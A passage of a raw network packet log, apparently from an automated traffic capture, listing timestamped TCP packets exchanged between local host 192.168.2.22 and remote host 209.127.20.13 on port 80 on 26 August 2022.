                Aug 26, 2022 00:13:36.942898989 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:36.945250034 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:36.945282936 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:36.945360899 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.051100016 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.051165104 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.051265001 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.053318024 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.053361893 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.053451061 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.160144091 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.160180092 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.160206079 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.160289049 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.164315939 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.164355040 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.164433956 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.269164085 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.269200087 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.269222975 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.269295931 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.273040056 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.273211956 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.273241997 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.273340940 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.378978968 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.379050016 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.379113913 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.381098032 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.381165028 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.381208897 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.381225109 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.381299973 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.381342888 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.381350994 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.487488031 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.487524033 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.487701893 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.489259005 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.489358902 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.489377975 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.489422083 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.489465952 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.489516020 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.489614010 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.595999002 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.596060038 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.596097946 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.596287012 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.596345901 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.597460032 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.597517967 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.597573996 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.597574949 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.597614050 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.597666979 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.704541922 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.704581976 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.704602957 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.704624891 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.704647064 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.704658031 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.704706907 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.705566883 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.705602884 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.705631971 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.705635071 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.705658913 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.705683947 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.812922001 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.812969923 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.812995911 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.812995911 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.813023090 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.813044071 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.813055038 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.813107014 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.813605070 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.813637972 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.813692093 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.813901901 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.813950062 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.814018965 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.921112061 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.921195030 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.921226025 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.921251059 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.921255112 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.921277046 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.921299934 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.921304941 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.921330929 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.921349049 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.921686888 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.921713114 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.921745062 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.921993017 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:37.922043085 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:37.922135115 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.029406071 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.029509068 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.029577017 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.029580116 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.029623985 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.029678106 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.029732943 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.029767990 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.029788017 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.029840946 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.029875994 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.029896021 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.029951096 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.029985905 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.030077934 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.030134916 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.030172110 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.138384104 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.138413906 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.138430119 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.138454914 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.138472080 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.138478994 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.138504028 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.138505936 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.138540030 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.138586998 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.138839960 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.138859034 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.138880968 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.138906002 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.138942957 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.138942957 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.139022112 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.139058113 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.139058113 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.246531963 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.246553898 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.246578932 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.246591091 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.246618986 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.246634007 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.246659040 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.246664047 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.246671915 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.246676922 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.246690989 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.246707916 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.246740103 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.246776104 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.247073889 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.247101068 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.247111082 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.247117043 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.247134924 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.247143030 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.247152090 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.247176886 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.247180939 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.247215986 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.354634047 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.354692936 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.354722023 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.354749918 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.354777098 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.354798079 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.354830027 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.354832888 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.354835987 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.354962111 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.355007887 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.355117083 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.355166912 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.355195999 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.355206966 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.355238914 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.355278969 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.462786913 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.462833881 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.462943077 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.463073015 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.463125944 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.463165045 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.463176012 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.463197947 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.463232994 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.463246107 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.571119070 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.571223974 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.571253061 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.571276903 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.571330070 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.571372986 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.571408033 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.571453094 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.571584940 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.571650982 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.571701050 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.680620909 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.680660009 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.680751085 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.681075096 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.681104898 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.681138039 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.681157112 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.681221008 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.681255102 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.681263924 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.681332111 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.681411982 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.681430101 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.800580978 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.800635099 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.800745010 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.801060915 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.801104069 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.801126003 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.801153898 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.801186085 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.801204920 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.801219940 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.801269054 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:38.801557064 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.801598072 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:38.801670074 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.096488953 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.096568108 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.204627037 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.204689026 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.204729080 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.204763889 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.204771042 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.204811096 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.204816103 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.312840939 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.312871933 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.312896013 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.312917948 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.312928915 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.312935114 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.312957048 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.312975883 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.312999010 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.420973063 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.421039104 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.421078920 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.421119928 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.421123028 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.421159029 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.421164036 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.421200991 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.421241045 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.421245098 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.421283007 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.421324968 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.529830933 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.529896975 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.529938936 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.529959917 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.529989004 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.530030012 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.530041933 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.530072927 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.530114889 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.530127048 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.530153990 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.530195951 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.530210018 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.638164043 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.638247013 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.638283014 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.638307095 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.638354063 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.638365984 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.638422966 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.638468981 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.638479948 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.638535976 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.638592005 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.638598919 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.746953011 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.747011900 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.747055054 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.747107983 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.747148991 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.747196913 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.747252941 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.747292995 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.747308016 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.747334003 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.747404099 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.747456074 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.747497082 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.747549057 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.855623960 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.855688095 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.855731010 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.855743885 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.855772018 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.855786085 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.855793953 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.855812073 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.855814934 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.855853081 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.855860949 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.855892897 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.855904102 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.855933905 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.855937958 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.855974913 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.855979919 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.856014967 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.856019974 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.856060028 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.964472055 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.964538097 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.964612007 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.964653969 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.964695930 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.964696884 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.964704990 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.964735985 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.964744091 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.964776039 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.964782000 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.964823008 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:39.964827061 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:39.964875937 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.073371887 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.073443890 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.073484898 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.073496103 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.073525906 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.073539972 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.073545933 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.073566914 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.073590040 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.073606968 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.073611975 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.073649883 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.073651075 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.073692083 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.160187006 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.160341024 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.269049883 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.269148111 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.269212961 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.269259930 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.269270897 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.269330978 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.269335032 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.269395113 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.269454002 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.269454956 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.269515991 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.269570112 CEST4917480192.168.2.22209.127.20.13
                Aug 26, 2022 00:13:40.377579927 CEST8049174209.127.20.13192.168.2.22
                Aug 26, 2022 00:13:40.377635002 CEST8049174209.127.20.13192.168.2.22
